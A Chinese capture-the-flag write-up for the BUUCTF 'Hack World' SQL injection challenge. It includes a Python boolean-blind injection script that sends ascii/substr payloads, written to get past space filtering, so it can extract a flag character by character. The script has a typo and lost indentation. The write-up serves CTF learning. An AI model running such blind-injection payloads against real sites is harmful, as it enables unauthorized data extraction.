BUUCTF [CISCN2019 华北赛区 Day2 Web1] Hack World

1、通过题目,可以知道该题目为SQL注入类型:

2、判断注入类型为数字注入:

3、通过BP抓包,来判断注入点。

字典爆破发现常规的注入方式都被过滤。

4、因此可以尝试通过布尔盲注的方式来得到flag。编写脚本得到flag

import requests

url = "http://977ba0f7-8772-4617-9600-8089c3d7e1e3.node5.buuoj.cn:81/index.php"

result = ""

for i in range(1, 50):

for j in range(32, 128):

payload = "(ascii(substr((select(flag)from(flag)),{m},1))>{n})"

response = requests.post(url=url, data={'id': payload.format(m=i, n=j)})

{m} 是当前正在提取的 flag 字符位置,{n} 是 ASCII 码值,用于比较。

f response.text.find('girl') == -1:

result += chr(j)

print(j)

break

print("正在输出flag:", result)

print("flag:", result)

#外层循环 (for i in range(1, 50)):循环遍历 flag 的每个字符位置,假设 flag 最长为 50 个字符。

#内层循环 (for j in range(32, 128)):循环遍历 ASCII 字符集中的可打印字符(从空格到 '~')。

#payload 变量:构造了一个 SQL 注入 payload,使用 substr() 函数逐个提取 flag 的字符,并通过 ascii() 函数转换为 ASCII 码值,然后与 j 比较。

5、得到flag:

相关推荐
晴子呀44 分钟前
Spring Boot 项目文件上传安全与优化:OSS、MinIO、Nginx 分片上传实战
安全
火山引擎开发者社区1 小时前
来自火山引擎的 MCP 安全授权新范式
安全·火山引擎·mcp
0x派大星1 小时前
智能合约安全全解析:常见漏洞、真实案例与防范实践
安全·去中心化·区块链·智能合约
Frank Underwood_P2 小时前
零信任网络(1)
网络
一袋米扛几楼985 小时前
【物联网】MQTT / Broker / Topic 是什么?
网络·物联网
天翼云开发者社区5 小时前
分布式系统-秒杀
大数据·安全·中间件
AI浩6 小时前
Transformer架构三大核心:位置编码(PE)、前馈网络(FFN)和多头注意力(MHA)。
网络·深度学习·transformer
monster_风铃6 小时前
神州数码VRRP 原理与配置篇
网络·智能路由器
运维_攻城狮7 小时前
Nessus 是一款免费功能强大的漏洞扫描工具,广泛用于网络安全评估。
安全·web安全
小楓12017 小时前
WEB漏洞挖掘篇(一) 基本概念、十大常見WEB漏洞
安全·web安全·漏洞挖掘